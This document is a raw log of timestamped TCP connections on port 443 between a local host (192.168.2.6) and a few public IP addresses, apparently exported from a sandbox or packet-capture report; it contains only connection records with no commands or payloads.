                                                                                                                                                                        Nov 21, 2024 10:37:17.328840017 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.328877926 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.328907967 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561237097 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561307907 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561331987 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561359882 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561393023 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561418056 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561536074 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561585903 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561602116 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561609983 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561660051 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561681986 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561723948 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561791897 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561801910 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561820984 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.561862946 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.561882019 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.682553053 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.682631969 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.682653904 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.682670116 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.682723045 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.712933064 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.712965965 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.713119030 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.713128090 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.713176966 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.735189915 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.735224962 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.735344887 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.735368013 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.735421896 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.761123896 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.761192083 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.761255026 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.761279106 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.761295080 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.761326075 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.775988102 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.776057005 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.776150942 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.776201010 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.776212931 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.955992937 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.956070900 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.956242085 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.958636999 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.958667994 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.958740950 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.959247112 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.959275007 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.960866928 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.960906029 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.961103916 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.961286068 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.961303949 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.962192059 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.962204933 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.963963032 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964004993 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.964076996 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964087009 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.964116096 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964147091 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964255095 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964284897 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.964368105 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.964378119 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:18.721836090 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:18.721877098 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:18.721940994 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:18.722655058 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:18.722671986 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.447774887 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:19.447833061 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.447932959 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:19.459594965 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:19.459625959 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.712061882 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.721215963 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.721276999 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.721352100 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.729440928 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.729461908 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.733695030 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.733707905 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.741609097 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.741622925 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.756944895 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.757735968 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.761847973 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.761869907 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.767667055 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.770061970 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.770066977 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.774272919 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.774326086 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.778295040 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.778299093 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.782476902 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.782507896 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:19.798347950 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:19.798358917 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.154840946 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.154910088 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.155016899 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.155049086 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.155097008 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.156317949 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.158777952 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.158834934 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.159334898 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.159452915 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.159506083 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.199842930 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.199973106 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.200035095 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.204684019 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.204741001 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.204807043 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.204818964 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.205317974 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.205379963 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.252578020 CET49714443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.252597094 CET4434971413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.252969980 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.252993107 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.253041983 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.253051043 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.253093004 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.260037899 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.260096073 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.260139942 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.265799999 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.265810013 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.265822887 CET49718443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.265827894 CET4434971813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.295442104 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.295454025 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.295466900 CET49716443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.295470953 CET4434971613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.306163073 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.306195021 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.306214094 CET49717443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.306220055 CET4434971713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.331842899 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.331866026 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.331877947 CET49715443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.331883907 CET4434971513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.335107088 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.335160971 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.335226059 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.336549044 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.336564064 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.338994980 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.339026928 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.339082956 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.339204073 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.339211941 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.340581894 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.340596914 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.340651989 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.341398954 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.341413021 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.342958927 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.343003035 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.343063116 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.343290091 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.343307018 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.344018936 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.344063997 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.344153881 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.344487906 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:20.344506025 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.551184893 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.551280975 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:20.554259062 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:20.554270029 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.554631948 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.556395054 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:20.556461096 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:20.556468964 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.556714058 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:20.599334002 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.773674965 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.773792982 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:20.775568008 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:20.775583982 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.776108980 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:20.829643011 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:20.834541082 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:20.834541082 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:20.834716082 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.077965975 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.078058004 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.078140974 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:21.078423023 CET49719443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:21.078466892 CET4434971940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.468913078 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.469038010 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.469127893 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.470957041 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.470982075 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.471024990 CET49720443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.471031904 CET44349720188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.536772013 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.536838055 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:21.536911964 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.537180901 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:21.537200928 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.054805994 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.055334091 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.055366993 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.055800915 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.055809975 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.057467937 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.057862997 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.057898045 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.058197975 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.058224916 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.124907970 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.125509024 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.125555992 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.125956059 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.125969887 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.126511097 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.126759052 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.126796961 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.127103090 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.127110004 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.191062927 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.191842079 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.191893101 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.192308903 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.192321062 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.490005970 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.490086079 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.490144014 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.493859053 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.493886948 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.493897915 CET49722443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.493905067 CET4434972213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.494888067 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.494940996 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.494988918 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.495304108 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.495304108 CET49725443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.495335102 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.495349884 CET4434972513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.498020887 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498051882 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.498166084 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498441935 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498450994 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.498550892 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498632908 CET49727443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498648882 CET4434972713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.498761892 CET49728443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.498778105 CET4434972813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.568386078 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.568553925 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.568687916 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.568936110 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.568957090 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.568972111 CET49721443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.568979979 CET4434972113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.571829081 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.571899891 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.571970940 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.572753906 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.572828054 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.572910070 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.573045969 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.573071957 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.573123932 CET49724443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.573137999 CET4434972413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.574428082 CET49729443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.574457884 CET4434972913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.577043056 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.577079058 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.577308893 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.577308893 CET49730443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.577341080 CET4434973013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.643352985 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.643439054 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.643505096 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.643701077 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.643723011 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.643738031 CET49723443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.643745899 CET4434972313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:22.647370100 CET49731443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:22.647423029 CET4434973113.107.246.60192.168.2.6
